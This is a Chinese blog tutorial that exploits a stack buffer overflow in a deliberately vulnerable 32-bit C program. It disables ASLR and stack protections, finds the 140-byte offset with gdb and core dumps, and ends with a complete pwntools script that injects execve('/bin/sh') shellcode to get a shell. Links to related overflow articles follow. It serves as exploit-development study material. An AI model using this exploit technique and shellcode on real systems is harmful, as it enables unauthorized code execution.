学习linux溢出-1

最新推荐文章于 2021-05-08 08:05:06 发布
最新推荐文章于 2021-05-08 08:05:06 发布
阅读量466 收藏
点赞数
分类专栏: 系统调试 文章标签: linux 栈溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35519254/article/details/76228351
版权
调试环境是ubuntu14 32位

代码是1.c: 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void vulnerable_function() 
{ char buf[128]; 
read(STDIN_FILENO, buf, 256);
}
int main(int argc, char** argv) 
{ 
vulnerable_function(); 
write(STDOUT_FILENO, "Hello, World\n", 13);
}



gcc -fno-stack-protector -z execstack -o 1 1.c
关闭ASLR:
sudo -s
echo 0 > /proc/sys/kernel/randomize_va_space
exit
首先确定溢出点的偏移,先生成150个随机字符:
python pattern.py create 150
随后我们使用gdb ./level1调试程序。
输入刚才生成的字符串,此时程序异常,确定程序出错地址,通过python pattern.py offset 0x.....来确定溢出点。
计算出PC返回值的覆盖点为140个字节。我们只要构造一个”A”*140+ret字符串,就可以让pc执行ret地址上的代码了。
shellcode就不说了,网上多得是。
这里我们使用一段最简单的执行execve ("/bin/sh")命令的语句作为shellcode。
溢出点有了,shellcode有了,下一步就是控制PC跳转到shellcode的地址上:
[shellcode][“AAAAAAAAAAAAAA”….][ret]


为了避免调试环境对buf定为的影响,开启核心转储:
ulimit -c unlimited
sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'

这样当程序执行出错时,会在/tmp/目录下,生成一个核心转储文件。
调试转储文件。
gdb level1 /tmp/core.1433844471
x/10s $esp-144

因为溢出点是140个字节,再加上4个字节的ret地址,我们可以计算出buffer的地址为$esp-144。通过gdb的命令 “x/10s $esp-144”,我们可以得到buf的地址为0xbffff290。

最终exp: 
#!/usr/bin/env python
from pwn import *
p = process('./level1') 
ret = 0xbffff290
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"shellcode += "\x0b\xcd\x80"# p32(ret) == struct.pack("<I",ret) #对ret进行编码,将地址转换成内存中的二进制存储形式
payload = shellcode + 'A' * (140 - len(shellcode)) + p32(ret)
p.send(payload) #发送payload
p.interactive() #开启交互shell

没啥新意,主要参考一步一步学ROP之linux_x86篇( http://www.anquan.us/static/drops/tips-6597.html

Note:
重点是为什么是140,但是char buff[128]呀。
qq_35519254
关注
专栏目录
简单栈溢出与execve执行|攻防世界新手区level3
Kni9hT's Blog
03-26 695
文章目录前言0x00.检查保护0x01.栈溢出漏洞0x02.one_gadget0x03.思路0x04.exp 前言 pwn新手区还残留一题,就是这个level3,当初好像是因为远程打不通所以没做掉.我记得当初好像是没有给库的,现在给了个libc_32.so.6 0x00.检查保护 devil@ubuntu:~/adworld/pwn$ checksec level3 [*] '/home/de...
linux3.13.0内核溢出漏洞exp,Linux Kernel Pwn 学习笔记(栈溢出)
weixin_42558758的博客
05-06 496
0x01 背景栈溢出是最基本的一个漏洞,学习 pwn 从栈溢出开始学习是比较简单的入门方式。之前也研究过 linux 内核,但因为种种原因不得不放弃。现在跟着安卓版主学习了几天linux内核漏洞,收获了不少知识,开始自己梳理和分享自己的笔记,特此感谢版主老师的教导0x02 内核基本知识Canary: 是防止栈溢出的保护,一般在 ebp-0x8 的位置,学习 linux pwn 的基本知识,不细讲K...
溢出Linux环境下运行)
xq972的博客
05-28 260
溢出Linux环境下运行)源代码代码解释Linux环境下运行结果溢出分析 源代码 #include <stdio.h> #include <stdlib.h> int sq(int x) { return x*x; } int main(int argc, char *argv[]) { int i; for (i = 1; i < ar...
和core说再见之:栈溢出
ruilinruirui
09-01 256
1. 概述 栈,就是那些由编译器在需要的时候分配,在不需要的时候自动清除的变量的存储区。里面的变量通常是局部变量、函数参数等;和堆相比,栈通常很小,在linux下,通过ulimit -s可以查看栈的大小。 所谓栈溢出,是缓冲区溢出的一种,本质上是写入栈的数据超过栈的大小,使得数据写入其他单元,往往造成不可预期的后果,最常见的就是程序崩溃。 2. 实例 一个栈溢出的程序:#include...
现代Linux操作系统的栈溢出
Letcos
05-22 308
译者注:本文源自《[细节剖析]X Windows中一个22年的漏洞》中提到的一篇文章,即如何溢出有保护机制的linux,路径如下:http://www.exploit-db.com/papers/24085/,本着学习的目的,在学习过程中,翻译出来分享给大家。 另外为了区分Stack和Heap,在本人的所有文章中 “Stack”与“栈”对等 “Heap”与“堆”对等 因为曾经被人坑惨了,有些文章中把“Stack”翻译成“堆栈”,搞得我着实的晕了好久。 前提条件: 对C语言和x86_64有基本的了解。 1.
linux 程序溢出,Linux环境程序栈溢出原理
weixin_34193397的博客
05-08 306
当在缓冲区中输入过多的数据时,缓冲区溢出就会发生,C语言提供了多种方法,可以使在缓冲区中输入的数据比预期的多。局部变量可以被分配到栈上。这就意味着在栈的某个地方有一个固定大小的缓冲区。而栈是向下增长的,而且一些重要的信息被存储在栈中,那么当向栈分配的缓冲区中存储的数据比它所能容纳的数据多时,将会发生溢出,并将过剩的数据溢出到堆栈上的相邻空间里。代码zhan.c#include #include #...
二进制漏洞挖掘-栈溢出-开启PIE1
08-04
第二次运行: 第三次运行: 第二步是通过第一步计算得到的程序加载基址计算出 puts 函数对应 puts@plt、got.plt 的 第三步是通过第二步泄露出的
Linux--裸机例程
最新发布
09-26
Linux操作系统的学习中,"裸机例程"通常指的是在没有操作系统内核支持的情况下,直接在硬件层面上运行的程序。这种程序设计通常用于嵌入式系统开发,或者是对底层硬件进行控制和优化的场景。在这样的环境中,...
Linux-UNIX系统编程手册(上册)1
08-03
4. 编写安全的程序:学习避免常见的安全漏洞,如缓冲区溢出、权限问题等。 5. 使用POSIX线程编写多线程程序:理解线程的创建、同步、通信和销毁,如pthread库的使用。 6. 构建和使用共享库:掌握动态链接库的创建和...
Linux中的基本x86-64bit缓冲区溢出
04-03
在IT安全领域,缓冲区溢出是常见...通过学习溢出原理、防范措施以及如何利用,我们可以更好地保护系统免受此类攻击。阅读"Basic-x86-64bit-Buffer-Overflows-in-Linux.pdf"文档将进一步深化这些概念,并提供实战示例。
linux 内存溢出分析,Linux溢出原理分析(示例代码)
weixin_39741459的博客
04-30 147
溢出与堆的内存布局有关,要搞明白堆溢出,首先要清楚的是malloc()分配的堆内存布局是什么样子,free()操作后又变成什么样子。解决第一个问题:通过malloc()分配的堆内存,如何布局?上图就是malloc()分配两块内存的情形。其中mem指针指向的是malloc()返回的地址,pre_size与size都是4字节数据,size存放当前chunk(内存块,本文均不翻译)大小,pre_siz...
linux 栈溢出学习之return_to_dl-resolve
jmp esp
12-16 1296
符号动态解析原理符号解析一个可执行文件可能会包含外部符号,可以简单的理解为包含“库函数”。这些函数(符号),在运行的时候必须得知道他们的地址,一个可执行文件在装载的时候,即使其本身装载的位置是固定的,其“库函数”所在的文件的装载位置是不定的,但是又必须知道其精确地址才可以进行运行。所以,符号解析,即将外部符号的具体地址找到,包含两种方法: 静态解析:在编译之后的链接过程中,将外部符号所在的共享库的整
C语言中的数据溢出(详一)
qq_18299403的博客
02-03 2445
数据溢出 1. 举个栗子 unsigned int num = -1; printf("%u", num); 输出结果是什么呢? 结果: 为什么会这样? 解析: 首先在寄存器产生一个负数-1,它在计算机中存储的补码是 32个1,共32个二进制位,当按照赋值号赋给无符号num变量时,符号位变成数值位,所以按照无符号输出为4294967295。 2. 再举一个 short int s = 6...
Linux溢出漏洞利用之unlink
AliMobileSecurity的博客
06-06 4954
本文详细介绍了unlink攻击技术的核心原理,虽然上述介绍的unlink漏洞利用技术已经失效,但是还是有必要认真学习,因为它一方面可以进一步加深我们对glibc malloc的堆栈管理机制的理解,另一方面也为后续的各种堆溢出攻击技术提供思路。
linux栈溢出-绕过ROP、ASLR(知道libc.so)
小强的博客
07-28 1612
调试环境是ubuntu14 32位 这次开启了DEP、ASLR,在linux x86溢出,知道libc.so文件的情况下 代码是1.c: #include #include #include void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf, 256); } int main(i
Linux内存泄漏与溢出,linux内存溢出(oom)和内存泄漏(leak)
weixin_42166623的博客
04-30 3019
一、概念介绍:1、内存溢出 out of memory:是指程序在申请内存时,没有足够的内存空间供其使用,出现out of memory;比如申请了一个integer,但给它存了long才能存下的数,那就是内存溢出。2、内存泄露 memory leak:是指程序在申请内存后,无法释放已申请的内存空间,一次内存泄露危害可以忽略,但内存泄露堆积后果很严重,无论多少内存,迟早会被占光。注:memory ...
64位Linux下的栈溢出
omnispace的博客
03-29 5597
from:http://packetstormsecurity.com/files/download/127007/64bit-overflow.pdf 本文的目的是让大家学到64位缓冲区溢出的基础知识。 作者Mr.Un1k0d3r RingZer0 Team 摘要 0x01 x86和x86_64的区别 0x02 漏洞代码片段 0x03 触发溢出 0x04 控制RIP 0x05 跳入用户
Linux溢出原理分析
weixin_30709809的博客
11-03 567
溢出与堆的内存布局有关,要搞明白堆溢出,首先要清楚的是malloc()分配的堆内存布局是什么样子,free()操作后又变成什么样子。 解决第一个问题:通过malloc()分配的堆内存,如何布局? 上图就是malloc()分配两块内存的情形。 其中mem指针指向的是malloc()返回的地址,pre_size与size都是4字节数据,size存放当前chunk(内存块,本文均不翻译...
Linux堆栈保护与栈溢出攻击防范
"Linux操作系统为了防止基本栈溢出攻击,采用了多种保护机制,包括内存地址随机化、可执行程序的屏蔽保护、gcc编译器的gs验证码机制和ld链接器的堆栈段不可执行机制。这些机制在一定程度上提高了系统的安全性,使得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值